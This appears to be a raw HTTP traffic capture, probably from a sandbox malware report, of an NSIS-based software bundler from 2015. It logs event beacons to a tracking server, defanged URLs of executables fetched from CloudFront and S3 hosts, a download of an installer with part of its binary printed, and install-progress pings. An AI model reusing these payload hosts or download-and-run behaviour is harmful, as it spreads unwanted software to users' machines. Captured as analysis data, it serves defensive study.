{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Wed, 02 Sep 2015 06:39:10 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:10 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 190

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&errorlevel=0&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Wed, 02 Sep 2015 06:39:11 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:11 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 181

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Wed, 02 Sep 2015 06:39:11 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:11 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 194

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&errorlevel=0&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Wed, 02 Sep 2015 06:39:11 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:11 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 189

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Wed, 02 Sep 2015 06:39:12 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 202

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&errorlevel=0&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Wed, 02 Sep 2015 06:39:12 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:12 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 183

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Wed, 02 Sep 2015 06:39:14 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:14 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 196

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe&errorlevel=0&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Wed, 02 Sep 2015 06:39:15 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:15 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 199

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Wed, 02 Sep 2015 06:39:15 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:15 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 212

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe&errorlevel=0&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Wed, 02 Sep 2015 06:39:16 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:16 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 212

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d16hr9n7t75k58.cloudfront.net/df4a6a3ed77e60d6758afca091ca0c1f.exe&errorlevel=0&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Wed, 02 Sep 2015 06:39:29 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:29 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 199

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Wed, 02 Sep 2015 06:39:34 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:34 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 212

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe&errorlevel=0&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Wed, 02 Sep 2015 06:39:46 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:46 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 197

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://special-bundles.s3-website-us-east-1.amazonaws.com/setup_362.exe&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Wed, 02 Sep 2015 06:39:49 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:49 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 210

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://special-bundles.s3-website-us-east-1.amazonaws.com/setup_362.exe&errorlevel=0&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Wed, 02 Sep 2015 06:39:56 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:56 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 177

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d10huri5h4o4a3.cloudfront.net/policyname.exe&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Wed, 02 Sep 2015 06:39:57 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:57 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 190

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d10huri5h4o4a3.cloudfront.net/policyname.exe&errorlevel=0&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Wed, 02 Sep 2015 06:39:58 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:58 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 175

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.codec13sudha.com/download.php?l4J9dw==&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Wed, 02 Sep 2015 06:40:00 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:40:00 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}..

GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=131221&tag=RE_CLICKMEIN_DCOUNT1 HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Accept: */*

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Host: ads.regiedepub.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Wed, 02 Sep 2015 06:39:45 GMT

Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1

Content-Location: settags.cgi

Vary: negotiate

TCN: choice

Cache-Control: no-store, no-cache, must-revalidate

X-C4PC-ServerName: ads.regiedepub.com

P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"

Expires: Wed, 02 Sep 15 06:39:00 GMT

Set-Cookie: _c4aid=F697A5F90EAA4DBF83ECCC091C097DC5; expires=Mon, 29 Feb 16 06:39:00 GMT; domain=regiedepub.com; path=/;

Set-Cookie: _c4aid2=F697A5F90EAA4DBF83ECCC091C097DC5,1441175985.94416; expires=Mon, 29 Feb 16 06:39:00 GMT; domain=regiedepub.com; path=/;

Connection: close

Transfer-Encoding: chunked

Content-Type: text/javascript

41.......if (window.rdp_callback).....rdp_callback(1203, 131221);......0..

GET /OperaRUnew/Bundle_OperaRUnew.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: VVV.software-forus.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Wed, 02 Sep 2015 06:39:16 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1440084186"

Last-Modified: Thu, 20 Aug 2015 15:23:06 GMT

Cache-Control: max-age=20696

Content-Length: 100486

Content-Type: application/octet-stream

X-HW: 1441175956.dop018.am4.t,1441175956.cds053.am4.c

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................p...............................................s.......`..8............................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata... ...@...........................rsrc...8....`.......v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..

<<< skipped >>>

GET /utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=0beb334165382025853a9a860db0b131&rnd=5890 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: uv0WxhI1 lZNQGeNmyUyaVJYlSGVT2psgs4X7mc4YetHdTbKTcYE1Ufhbly3CdsVmgFzOelYezU=

x-amz-request-id: 18209098B93D81A8

Date: Wed, 02 Sep 2015 06:39:17 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=0beb334165382025853a9a860db0b131&rnd=8163 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: ja16wiktBzYkozOMWCCMeVWIOMc4pY3FY9jX662xbpe foeWOhu/6pT94foTZ7yKO4jlYI9ymI8=

x-amz-request-id: 8D9E6A0F0CADB59F

Date: Wed, 02 Sep 2015 06:39:17 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=0beb334165382025853a9a860db0b131&rnd=6404 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: jk06f 20MqiVRmhiPUNjGIeRUikAXjDTzWQfg16wjdxXJIpkwyIPwMWtscQ pEDcwoYioiCqtiM=

x-amz-request-id: 113E11ECA0528EA6

Date: Wed, 02 Sep 2015 06:39:18 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: jk06f 20MqiVRmhiPUNjGIeRUikAXjDTzWQfg16wjdxXJIpkwyIPwMWtscQ pEDcwoYioiCqtiM=..x-amz-request-id: 113E11ECA0528EA6..Date: Wed, 02 Sep 2015 06:39:18 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=0beb334165382025853a9a860db0b131&rnd=1711 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: 6PDlbR9lr LNC5cfL8PifHjlB5nNMB6RpkXB1uZ0ybuWk5JKEtncIvWwEBrwYmZ58Nv/WRO3GBA=

x-amz-request-id: CB55A3AC81E6CE99

Date: Wed, 02 Sep 2015 06:39:23 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 6PDlbR9lr LNC5cfL8PifHjlB5nNMB6RpkXB1uZ0ybuWk5JKEtncIvWwEBrwYmZ58Nv/WRO3GBA=..x-amz-request-id: CB55A3AC81E6CE99..Date: Wed, 02 Sep 2015 06:39:23 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=0beb334165382025853a9a860db0b131&rnd=1250 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: Y6DeCxKW3Q9RI4ndTCLI2dUnAc5Kww2I39DDPYeLY eXa 8LcqWkAj2DyiBYHTEFDfkQFhAXWHE=

x-amz-request-id: 561C039F0DA9BDB2

Date: Wed, 02 Sep 2015 06:39:26 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: Y6DeCxKW3Q9RI4ndTCLI2dUnAc5Kww2I39DDPYeLY eXa 8LcqWkAj2DyiBYHTEFDfkQFhAXWHE=..x-amz-request-id: 561C039F0DA9BDB2..Date: Wed, 02 Sep 2015 06:39:26 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=0beb334165382025853a9a860db0b131&rnd=3154 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: fkCkt6obbbHcVc Ezre046lgkW O9BheB0jL6hk8PpCkl4m3TESfDy8KT6AWJPDMnP8OXNe1dNk=

x-amz-request-id: E361A47DB0808D42

Date: Wed, 02 Sep 2015 06:39:36 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: fkCkt6obbbHcVc Ezre046lgkW O9BheB0jL6hk8PpCkl4m3TESfDy8KT6AWJPDMnP8OXNe1dNk=..x-amz-request-id: E361A47DB0808D42..Date: Wed, 02 Sep 2015 06:39:36 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=0beb334165382025853a9a860db0b131&rnd=6008 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: E0nJoZPzH6UQYOUrE1T7xC 85vHAIA2MC4HqsApLsOf7TfxMc6bkxLS46 kWLGDb Au1UA iIA0=

x-amz-request-id: 6CFBDB0B49423DAB

Date: Wed, 02 Sep 2015 06:39:38 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

